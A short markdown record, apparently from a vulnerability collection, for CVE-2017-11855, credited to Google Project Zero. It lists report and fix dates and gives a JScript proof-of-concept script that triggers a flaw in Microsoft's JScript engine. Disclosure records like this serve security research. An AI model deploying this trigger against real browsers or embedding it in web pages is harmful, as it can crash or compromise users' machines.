CVE-2017-11855.md

CVE-2017-11855

• Report: Oct 2017
• Fix: Dec 2017
• Credit: ifratric of Google Project Zero

PoC

<script language="Jscript.Encode">
var x = new URIError(new Array(), undefined, undefined);
String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));
Array.prototype.slice.call(1);
</script>

Reference

• Microsoft
• Google Project Zero